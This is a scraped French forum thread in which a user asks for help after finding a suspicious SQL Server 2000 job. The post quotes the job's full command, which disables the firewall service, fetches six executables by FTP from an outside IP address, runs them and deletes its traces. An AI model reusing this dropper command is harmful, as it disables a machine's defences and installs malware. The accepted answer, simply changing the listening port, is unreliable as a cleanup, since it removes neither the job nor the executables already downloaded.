begin process at 2012 05 27 02:25:15
  Trouver un code source :

dans

Accueil > Forum > 

SQL

> 

Autre

> 

Divers

> 

Sql server 2000

Derniers messages déposésPoser une question dans le forum ou lancer une discussion

Sql server 2000

lundi 10 janvier 2011 à 17:16:07 | Sql server 2000

daouame

Bonjour

mon serveur est devenu très lent ,j ai remarqué un JOB Bizarre qui a été crée pour exécuter cette commande :
cmd /c "sc config SQLSERVERAGENT start= AUTO&net1 stop sharedaccess&echo open 122.224.54.14> cmd.txt&echo 1433>> cmd.txt&echo donw>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo get 2.exe >> cmd.txt&echo get 3.exe >> cmd.txt&echo get 4.exe >> cmd.txt&echo get 5.exe >> cmd.txt&echo get 6.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1.exe&2.exe&3.exe&4.exe&5.exe&6.exe&del cmd.txt /q /f&exit"

Après vérification sur le net j ai trouvé que c'est un virus qui exploite une faille de SQL server 2000 prière m'aider à trouver une solution à ce problème.

vendredi 4 février 2011 à 18:05:09 | Re : Sql server 2000

daouame

Réponse acceptée !
Bonjour

La solution est de changer le port d'écoute de SQL server 1433 par un autre port

Cette discussion est classée dans : exe, txt, echo, get, cmd

Répondre à ce message

Sujets en rapport avec ce message

enregistrer le resultat d'une requete dans un fichier TXT [ par enrageur ] voila, j'aimerais en registrer le resultat d'une requete du type :SELECT * FROM TOTOdans un fichier txt. Je crois qu'il y a une commande pour cel a me utiliser mysqlhotcopy [ par moricenov ] Bonjour à tous; j'ai un probleme avec se script perl ; le script est: #!/bin/sh #list of databases to be backed up separated by space dblist="unic Base de données [ par The_magicien ] Bonjour, le code suivant est fait pour modifier une information sur une BD, cependant, il m'indique une erreur à la ligne 56 mais je ne trouve pas d'e [MSDE] BACKUP en .sql ou en .txt d'une base [ par vaginator120 ] Bonjour,Je souhaiterais savoir si il est possible avec MSDE de créer une sauvegarde de ma base en .sql ou en .txt.En faite, je recherche un equivalent inverser 2 lignes [ par mariobotta ] bonjour,Je cherche un moyen pour ordoner mon menu grace à un lien du type "up"/"down" suivant le cas.Mais pour cela je pense devoir inverser 2 ligne p Erreur SQL Sur les Dates [ par Baguauda ] Bonjour a tous, j'ai une petite erreur SQL qui est bien chiante. Erreur 25903 "Il existe une erreur dans une partie du format de la date. [ Express Requête tri par date [ par coyote_fx ] Bonjour à tous,voilà je dois composer une requête dynamique de recherche sur une table de ma base de données (COMMANDES):Exemple de syntaxe de ma requ Probleme de requete REPLACE [ par neovalpox ] Alors voila, je dois faire une base de donnée pour le boulot, et je la gère entièrement via une interface Flash.Mes problemes sont les suivants :1. Je connexion multiples [ par beny100 ] bonjour,voici mon code de connexion ,mais apres connection j'arrive pas a obtenir la valeure dans l'entier Kaidez moi voici mon code je sais pas ou se Ob de requete avec IN [ par boninou ] Bonjour à tous,Voila mon probleme : je souhatiterai effacer de ma base de données tous les paniers qui n'ont pas été validés par les clients.Voila ma

Nos sponsors

Sondage...

Comparez les prix

CalendriCode

Mai 2012
LMMJVSD
 123456
78910111213
14151617181920
21222324252627
28293031   

Consulter la suite du CalendriCode

A découvrir

Développement réalisé par Nicolas SOREL (Nix) avec l'aide de : Cyril DURAND et Emmanuel (EBArtSoft), Merci à Vincent pour ses précieux conseils.
CodeS-SourceS.com© Toute reproduction même partielle est interdite sauf accord écrit du Webmaster
CodeS-SourceS.com© est une marque déposée tous droits réservés

Google Coop CodeS-SourceS Google Coop CodeS-SourceS
Temps d'éxécution de la page : 0,343 sec (3)

Nous contacter | Annoncer sur CodeS-SourceS | Mentions légales